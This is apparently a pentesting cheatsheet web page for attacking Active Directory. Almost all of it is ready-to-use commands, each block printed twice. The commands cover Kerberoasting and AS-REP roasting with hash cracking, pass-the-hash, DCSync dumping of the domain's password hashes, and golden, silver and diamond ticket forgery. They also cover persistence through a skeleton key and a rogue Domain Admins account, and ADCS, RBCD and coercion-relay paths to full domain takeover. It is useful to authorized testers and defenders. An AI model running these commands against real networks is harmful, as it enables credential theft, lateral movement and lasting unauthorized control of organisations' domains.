Quick Reference

Advanced

Active Directory Cheatsheet

Essential commands for AD enumeration, Kerberos attacks, and domain compromise.

Authorization Required

These commands are for authorized penetration testing only. Unauthorized access to AD environments is illegal.

MITRE ATT&CK Coverage

Domain Enumeration

domain-enum.ps1

powershell

# Get domain info
Get-ADDomain
Get-ADForest
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Get domain controller
Get-ADDomainController
nltest /dclist:DOMAIN

# Get domain SID
Get-ADDomain | Select-Object DomainSID

# PowerView - Get domain info
Get-Domain
Get-DomainController
Get-DomainSID
# Get domain info
Get-ADDomain
Get-ADForest
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Get domain controller
Get-ADDomainController
nltest /dclist:DOMAIN

# Get domain SID
Get-ADDomain | Select-Object DomainSID

# PowerView - Get domain info
Get-Domain
Get-DomainController
Get-DomainSID

User Enumeration

user-enum.ps1

powershell

# List all users
Get-ADUser -Filter * -Properties *
net user /domain

# Find privileged users
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADGroupMember -Identity "Enterprise Admins" -Recursive
Get-ADGroupMember -Identity "Administrators" -Recursive

# PowerView - User enumeration
Get-DomainUser
Get-DomainUser -SPN  # Kerberoastable users
Get-DomainUser -AdminCount  # Protected users
Find-LocalAdminAccess  # Where current user has admin

# Find users with interesting descriptions
Get-ADUser -Filter * -Properties Description | Where-Object {$_.Description -ne $null}
# List all users
Get-ADUser -Filter * -Properties *
net user /domain

# Find privileged users
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADGroupMember -Identity "Enterprise Admins" -Recursive
Get-ADGroupMember -Identity "Administrators" -Recursive

# PowerView - User enumeration
Get-DomainUser
Get-DomainUser -SPN  # Kerberoastable users
Get-DomainUser -AdminCount  # Protected users
Find-LocalAdminAccess  # Where current user has admin

# Find users with interesting descriptions
Get-ADUser -Filter * -Properties Description | Where-Object {$_.Description -ne $null}

Kerberos Attacks

AS-REP Roasting

asrep-roast.sh

bash

# Find AS-REP roastable users
Get-DomainUser -PreauthNotRequired

# Rubeus - AS-REP Roast
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

# Impacket - AS-REP Roast
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile hashes.txt

# Crack with hashcat
hashcat -m 18200 hashes.txt wordlist.txt
# Find AS-REP roastable users
Get-DomainUser -PreauthNotRequired

# Rubeus - AS-REP Roast
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

# Impacket - AS-REP Roast
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile hashes.txt

# Crack with hashcat
hashcat -m 18200 hashes.txt wordlist.txt

Kerberoasting

kerberoast.sh

bash

# Find kerberoastable users
Get-DomainUser -SPN

# Rubeus - Kerberoast
Rubeus.exe kerberoast /outfile:hashes.txt

# Impacket - Kerberoast
GetUserSPNs.py DOMAIN/user:password -request -outputfile hashes.txt

# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt
# Find kerberoastable users
Get-DomainUser -SPN

# Rubeus - Kerberoast
Rubeus.exe kerberoast /outfile:hashes.txt

# Impacket - Kerberoast
GetUserSPNs.py DOMAIN/user:password -request -outputfile hashes.txt

# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt

Pass the Hash/Ticket

pth-ptt.sh

bash

# Pass the Hash with Impacket
psexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET

# Pass the Hash with CrackMapExec
cme smb TARGET -u Administrator -H NTLM_HASH -x "whoami"

# Pass the Ticket with Rubeus
Rubeus.exe ptt /ticket:ticket.kirbi

# Pass the Ticket with Impacket
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGET

# OverPass the Hash (Request TGT from NTLM)
Rubeus.exe asktgt /user:Administrator /rc4:NTLM_HASH /ptt
# Pass the Hash with Impacket
psexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET

# Pass the Hash with CrackMapExec
cme smb TARGET -u Administrator -H NTLM_HASH -x "whoami"

# Pass the Ticket with Rubeus
Rubeus.exe ptt /ticket:ticket.kirbi

# Pass the Ticket with Impacket
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGET

# OverPass the Hash (Request TGT from NTLM)
Rubeus.exe asktgt /user:Administrator /rc4:NTLM_HASH /ptt

DCSync Attack

dcsync.sh

bash

# DCSync with Mimikatz (requires replication rights)
lsadump::dcsync /domain:DOMAIN /user:krbtgt
lsadump::dcsync /domain:DOMAIN /all /csv

# DCSync with Impacket
secretsdump.py DOMAIN/user:password@DC_IP
secretsdump.py -hashes :NTLM_HASH DOMAIN/Administrator@DC_IP

# Dump entire AD database
secretsdump.py DOMAIN/Administrator@DC_IP -just-dc-ntlm
# DCSync with Mimikatz (requires replication rights)
lsadump::dcsync /domain:DOMAIN /user:krbtgt
lsadump::dcsync /domain:DOMAIN /all /csv

# DCSync with Impacket
secretsdump.py DOMAIN/user:password@DC_IP
secretsdump.py -hashes :NTLM_HASH DOMAIN/Administrator@DC_IP

# Dump entire AD database
secretsdump.py DOMAIN/Administrator@DC_IP -just-dc-ntlm

Golden & Silver Tickets

Golden Ticket

golden-ticket.sh

bash

# Create Golden Ticket (requires krbtgt hash)
# Mimikatz
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ptt

# Impacket - ticketer
ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain DOMAIN Administrator

# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@DC
# Create Golden Ticket (requires krbtgt hash)
# Mimikatz
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ptt

# Impacket - ticketer
ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain DOMAIN Administrator

# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@DC

Silver Ticket

silver-ticket.sh

bash

# Create Silver Ticket (requires service account hash)
# For CIFS (file shares)
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER.DOMAIN /rc4:SERVICE_HASH /service:cifs /ptt

# For HTTP (web services)
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER.DOMAIN /rc4:SERVICE_HASH /service:http /ptt

# Impacket - ticketer
ticketer.py -nthash SERVICE_HASH -domain-sid DOMAIN_SID -domain DOMAIN -spn cifs/SERVER.DOMAIN Administrator
# Create Silver Ticket (requires service account hash)
# For CIFS (file shares)
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER.DOMAIN /rc4:SERVICE_HASH /service:cifs /ptt

# For HTTP (web services)
kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER.DOMAIN /rc4:SERVICE_HASH /service:http /ptt

# Impacket - ticketer
ticketer.py -nthash SERVICE_HASH -domain-sid DOMAIN_SID -domain DOMAIN -spn cifs/SERVER.DOMAIN Administrator

BloodHound Collection

bloodhound.sh

bash

# SharpHound - Collect all data
SharpHound.exe -c All

# BloodHound Python (remote collection)
bloodhound-python -d DOMAIN -u user -p password -c All -ns DC_IP

# Specific collection methods
SharpHound.exe -c DCOnly  # DC data only
SharpHound.exe -c Session  # Session info only
SharpHound.exe -c ACL  # ACL info only

# Loop collection (stealthy)
SharpHound.exe -c Session --loop --loopduration 02:00:00
# SharpHound - Collect all data
SharpHound.exe -c All

# BloodHound Python (remote collection)
bloodhound-python -d DOMAIN -u user -p password -c All -ns DC_IP

# Specific collection methods
SharpHound.exe -c DCOnly  # DC data only
SharpHound.exe -c Session  # Session info only
SharpHound.exe -c ACL  # ACL info only

# Loop collection (stealthy)
SharpHound.exe -c Session --loop --loopduration 02:00:00

Lateral Movement

lateral-movement.sh

bash

# WinRM
winrs -r:TARGET -u:DOMAIN\user -p:password cmd
Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user

# PsExec
psexec.exe \\TARGET -u DOMAIN\user -p password cmd
psexec.py DOMAIN/user:password@TARGET

# WMI
wmiexec.py DOMAIN/user:password@TARGET
wmic /node:TARGET process call create "cmd.exe /c whoami"

# SMB
smbexec.py DOMAIN/user:password@TARGET

# DCOM
dcomexec.py DOMAIN/user:password@TARGET
# WinRM
winrs -r:TARGET -u:DOMAIN\user -p:password cmd
Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user

# PsExec
psexec.exe \\TARGET -u DOMAIN\user -p password cmd
psexec.py DOMAIN/user:password@TARGET

# WMI
wmiexec.py DOMAIN/user:password@TARGET
wmic /node:TARGET process call create "cmd.exe /c whoami"

# SMB
smbexec.py DOMAIN/user:password@TARGET

# DCOM
dcomexec.py DOMAIN/user:password@TARGET

Trust Abuse

trust-abuse.ps1

powershell

# Enumerate trusts
Get-ADTrust -Filter *
Get-DomainTrust
nltest /domain_trusts /all_trusts

# Cross-domain ticket (SID History)
# Get child domain krbtgt hash and parent domain SID
kerberos::golden /user:Administrator /domain:CHILD.DOMAIN /sid:CHILD_SID /krbtgt:CHILD_KRBTGT /sids:PARENT_SID-519 /ptt

# Access parent domain
dir \\parent-dc.parent.domain\c$
# Enumerate trusts
Get-ADTrust -Filter *
Get-DomainTrust
nltest /domain_trusts /all_trusts

# Cross-domain ticket (SID History)
# Get child domain krbtgt hash and parent domain SID
kerberos::golden /user:Administrator /domain:CHILD.DOMAIN /sid:CHILD_SID /krbtgt:CHILD_KRBTGT /sids:PARENT_SID-519 /ptt

# Access parent domain
dir \\parent-dc.parent.domain\c$

Domain Persistence

persistence.ps1

powershell

# Skeleton Key (requires DC access)
# Inject into LSASS, allows any password for any user
privilege::debug
misc::skeleton

# Add user to Domain Admins
net group "Domain Admins" hacker /add /domain

# AdminSDHolder - Get persistent admin access
# Add user to AdminSDHolder ACL, propagates hourly
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity hacker -Rights All

# DSRM Password Change
# Change DSRM password (can log in as local admin on DC)
ntdsutil "set dsrm password" "reset password on server null" q q
# Skeleton Key (requires DC access)
# Inject into LSASS, allows any password for any user
privilege::debug
misc::skeleton

# Add user to Domain Admins
net group "Domain Admins" hacker /add /domain

# AdminSDHolder - Get persistent admin access
# Add user to AdminSDHolder ACL, propagates hourly
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity hacker -Rights All

# DSRM Password Change
# Change DSRM password (can log in as local admin on DC)
ntdsutil "set dsrm password" "reset password on server null" q q

Modern AD Attacks (2024+)

ADCS Attacks (Certipy)

Certificate Services misconfigurations — ESC1 through ESC15.

adcs.sh

bash

# Find vulnerable templates
certipy find -u user@domain -p 'pass' -dc-ip 10.0.0.1 -vulnerable -stdout

# ESC1: Enrollee Supplies Subject
certipy req -u user@domain -p 'pass' -ca CA-NAME -template VulnTemplate -upn administrator@domain

# ESC8: NTLM relay to Web Enrollment
certipy relay -target 'http://CA-IP/certsrv/' -template 'DomainController'

# Authenticate with PFX
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1
# Find vulnerable templates
certipy find -u user@domain -p 'pass' -dc-ip 10.0.0.1 -vulnerable -stdout

# ESC1: Enrollee Supplies Subject
certipy req -u user@domain -p 'pass' -ca CA-NAME -template VulnTemplate -upn administrator@domain

# ESC8: NTLM relay to Web Enrollment
certipy relay -target 'http://CA-IP/certsrv/' -template 'DomainController'

# Authenticate with PFX
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1

Shadow Credentials (msDS-KeyCredentialLink)

Add a key credential to a target object → request TGT as that account.

shadow-creds.sh

bash

# Add shadow credentials
certipy shadow auto -u user@domain -p 'pass' -account targetuser

# Or with pyWhisker
python3 pywhisker.py -d domain -u user -p pass --target targetuser --action add

# Use the cert to get NT hash via PKINIT
gettgtpkinit.py -cert-pfx target.pfx domain/targetuser tgt.ccache
# Add shadow credentials
certipy shadow auto -u user@domain -p 'pass' -account targetuser

# Or with pyWhisker
python3 pywhisker.py -d domain -u user -p pass --target targetuser --action add

# Use the cert to get NT hash via PKINIT
gettgtpkinit.py -cert-pfx target.pfx domain/targetuser tgt.ccache

RBCD (Resource-Based Constrained Delegation)

If you control an account with GenericWrite on a computer object, abuse RBCD for full takeover.

rbcd.sh

bash

# Set msDS-AllowedToActOnBehalfOfOtherIdentity
impacket-rbcd -delegate-from FAKECOMP$ -delegate-to TARGET$ -action write 'domain/user:pass'

# Get a service ticket as any user (e.g., administrator)
getST.py -spn cifs/target.domain.local -impersonate administrator -dc-ip 10.0.0.1 'domain/FAKECOMP$:pass'

# Use the ticket
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass target.domain.local
# Set msDS-AllowedToActOnBehalfOfOtherIdentity
impacket-rbcd -delegate-from FAKECOMP$ -delegate-to TARGET$ -action write 'domain/user:pass'

# Get a service ticket as any user (e.g., administrator)
getST.py -spn cifs/target.domain.local -impersonate administrator -dc-ip 10.0.0.1 'domain/FAKECOMP$:pass'

# Use the ticket
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass target.domain.local

Diamond / Sapphire Tickets

Modern golden-ticket variants that are harder to detect — request a real TGT, then modify the PAC.

diamond-sapphire.sh

bash

# Diamond Ticket (rubeus)
Rubeus.exe diamond /tgtdeleg /ticketuser:administrator /ticketuserid:500 /groups:512 /krbkey:KRBTGT_AES256

# Sapphire Ticket (impacket)
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-X-Y-Z -domain DOMAIN -request   -user existing_user -password 'pass' -dc-ip DC-IP administrator
# Diamond Ticket (rubeus)
Rubeus.exe diamond /tgtdeleg /ticketuser:administrator /ticketuserid:500 /groups:512 /krbkey:KRBTGT_AES256

# Sapphire Ticket (impacket)
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-X-Y-Z -domain DOMAIN -request   -user existing_user -password 'pass' -dc-ip DC-IP administrator

Coercion (PetitPotam / DFSCoerce / PrinterBug)

Force a target machine account to authenticate to your relay listener.

coerce.sh

bash

# PetitPotam (MS-EFSRPC)
python3 PetitPotam.py -u user -p pass LISTENER_IP TARGET_IP

# DFSCoerce (MS-DFSNM)
python3 dfscoerce.py -u user -p pass LISTENER_IP TARGET_IP

# PrinterBug (MS-RPRN, requires Print Spooler)
python3 printerbug.py domain/user:pass@TARGET LISTENER_IP

# Relay to ADCS Web Enrollment for full domain takeover
ntlmrelayx.py -t http://CA/certsrv/certfnsh.asp --adcs --template DomainController
# PetitPotam (MS-EFSRPC)
python3 PetitPotam.py -u user -p pass LISTENER_IP TARGET_IP

# DFSCoerce (MS-DFSNM)
python3 dfscoerce.py -u user -p pass LISTENER_IP TARGET_IP

# PrinterBug (MS-RPRN, requires Print Spooler)
python3 printerbug.py domain/user:pass@TARGET LISTENER_IP

# Relay to ADCS Web Enrollment for full domain takeover
ntlmrelayx.py -t http://CA/certsrv/certfnsh.asp --adcs --template DomainController

Pre-Auth Roasting (timeroasting / asreproast)

Bulk-extract crackable hashes without valid credentials.

roast.sh

bash

# AS-REP Roast (no preauth)
impacket-GetNPUsers -dc-ip DC-IP -no-pass -usersfile users.txt domain/

# Timeroasting (Windows Time Service)
python3 timeroast.py DC-IP > hashes.txt
hashcat -m 31300 hashes.txt rockyou.txt

# Kerberoast all SPNs at once
impacket-GetUserSPNs -request -dc-ip DC-IP domain/user:pass
# AS-REP Roast (no preauth)
impacket-GetNPUsers -dc-ip DC-IP -no-pass -usersfile users.txt domain/

# Timeroasting (Windows Time Service)
python3 timeroast.py DC-IP > hashes.txt
hashcat -m 31300 hashes.txt rockyou.txt

# Kerberoast all SPNs at once
impacket-GetUserSPNs -request -dc-ip DC-IP domain/user:pass

⚠️ Legal Disclaimer

Active Directory attacks can cause significant damage to production environments. Only use these techniques on systems you own or have explicit written authorization to test.

Active Directory Quick Reference

Active Directory Cheatsheet

MITRE ATT&CK Coverage

Domain Enumeration

User Enumeration

Kerberos Attacks

AS-REP Roasting

Kerberoasting

Pass the Hash/Ticket

DCSync Attack

Golden & Silver Tickets

Golden Ticket

Silver Ticket

BloodHound Collection

Lateral Movement

Trust Abuse

Domain Persistence

Modern AD Attacks (2024+)

ADCS Attacks (Certipy)

Shadow Credentials (msDS-KeyCredentialLink)

RBCD (Resource-Based Constrained Delegation)

Diamond / Sapphire Tickets

Coercion (PetitPotam / DFSCoerce / PrinterBug)

Pre-Auth Roasting (timeroasting / asreproast)

⚠️ Legal Disclaimer

Related Topics

AD Attack Paths

Kerberos Attacks

BloodHound

Impacket Cheatsheet

Related Tools

Nmap Builder

Encoder / Decoder

Payload Builder

Port Reference